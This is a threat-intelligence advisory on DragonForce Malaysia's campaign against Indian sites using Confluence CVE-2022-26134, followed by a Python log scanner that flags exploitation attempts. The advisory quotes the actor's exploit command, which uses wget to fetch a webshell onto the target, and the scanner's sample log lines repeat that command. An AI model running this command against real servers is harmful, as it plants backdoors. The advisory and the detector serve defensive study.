| Category | Threat Type | Motivation | Region | Source* |
|---|---|---|---|---|
| Adversary Intelligence | Latest Attack | Hacktivist | India | D4 |
- On 21 June 2022, a threat actor published a post on a cybercrime forum sharing a PoC (Proof of Concept) exploit for the Confluence Server vulnerability, along with a Shodan dork for locating Confluence Server targets in the Indian region.
- The actor also shared a GitHub repository containing the script, which can be run against a target with the following Python command:

  ```
  CVE-2022-26134.py http://targets.com "wget https://site.com/shell.txt -O DFM.php"
  ```
- Later that day, DragonForce Malaysia was seen sharing this exploit with all 152,257 subscribers of their Telegram channel.
- A significant amount of chatter was also observed on multiple cybercrime forums and Telegram channels regarding this Confluence vulnerability.
- On 10 June 2022, CloudSEK’s contextual AI digital risk platform XVigil discovered a Tweet posted by a Malaysian hacktivist group going by the name DragonForce, calling for attacks on Indian Government websites by Muslim hackers all around the world.
- The group’s primary objective, as claimed by them, was to retaliate against the Indian Government for controversial comments about the Prophet Muhammad made by some Indian politicians.
- The group behind this cyber call to arms, DragonForce Malaysia, is a pro-Palestinian hacktivist group based in Malaysia.
- This group owns and operates a forum where they post announcements and discuss their latest activities.
- The group also has Instagram and Facebook pages along with multiple Telegram channels. However, most content is replicated across their website and social media handles.
- The group has been conducting regular recruitment and promotion campaigns using TikTok and Instagram reels.
- Based on information from the open web, CloudSEK researchers identified that, as of 4 June 2022, at least 23 unique IPs were exploiting this vulnerability.
- A Shodan search showed at least 9,396 publicly reachable Confluence instances on the internet.
- Data from Cloudflare indicates that this vulnerability is being exploited at scale from multiple sources.
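As an added example (not CloudSEK's or the report's own tooling), a Python scanner that flags CVE-2022-26134 attempts in Confluence access logs and counts the distinct source IPs, the same metric as the unique-IP figure above. It assumes Common Log Format input and relies on the vulnerability's known signature, an OGNL `${...}` expression injected into the URI path (a detail the report itself does not state); the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not data from the report). Lines 1, 3
# and 4 imitate the shape of CVE-2022-26134 requests: an OGNL "${...}"
# expression injected into the Confluence URI path, here wrapping the
# webshell-dropper string from the PoC command above (not a working payload).
# Line 3 is double URL-encoded; line 5 has "${" only in the query string.
SAMPLE_LOG = """\
203.0.113.10 - - [21/Jun/2022:10:02:11 +0000] "GET /%24%7Bwget%20https://site.com/shell.txt%20-O%20DFM.php%7D/ HTTP/1.1" 302 0
198.51.100.7 - - [21/Jun/2022:10:03:45 +0000] "GET /login.action HTTP/1.1" 200 5120
203.0.113.10 - - [21/Jun/2022:10:04:02 +0000] "GET /%2524%257Bid%257D/ HTTP/1.1" 302 0
192.0.2.55 - - [21/Jun/2022:10:05:19 +0000] "GET /${wget https://site.com/shell.txt -O DFM.php}/ HTTP/1.1" 302 0
198.51.100.7 - - [21/Jun/2022:10:06:00 +0000] "GET /rest/api/content?title=${foo} HTTP/1.1" 200 300
"""

# Common Log Format: client IP, ident, user, [timestamp], "request line", status ...
CLF = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3})')

def request_path(request_line: str) -> str:
    """Extract the URI path from 'METHOD target HTTP/x.y', decoded twice so that
    double URL-encoding (%2524 -> %24 -> $) cannot hide the marker."""
    parts = request_line.split(" ")
    target = " ".join(parts[1:-1]) if len(parts) >= 3 else ""
    return unquote(unquote(target.split("?", 1)[0]))

def is_cve_2022_26134_attempt(path: str) -> bool:
    """The vulnerability is triggered by an OGNL expression in the path; no
    legitimate Confluence URL contains "${" there (query strings are ignored)."""
    return "${" in path

def scan_access_log(text: str):
    """Return (hits, unique_ips): flagged entries and the sorted distinct
    source IPs, the same metric as the unique-IP count in the report."""
    hits, ips = [], set()
    for line in text.splitlines():
        m = CLF.match(line)
        if not m:
            continue
        path = request_path(m["request"])
        if is_cve_2022_26134_attempt(path):
            hits.append({"ip": m["ip"], "ts": m["ts"], "path": path, "status": m["status"]})
            ips.add(m["ip"])
    return hits, sorted(ips)

if __name__ == "__main__":
    hits, ips = scan_access_log(SAMPLE_LOG)
    print(f"{len(hits)} exploitation attempts from {len(ips)} unique IPs: {ips}")
```

Only the path is inspected because the injection point for this CVE is the URI path; a `${` inside query parameters (for example a content search) is left alone to avoid false positives.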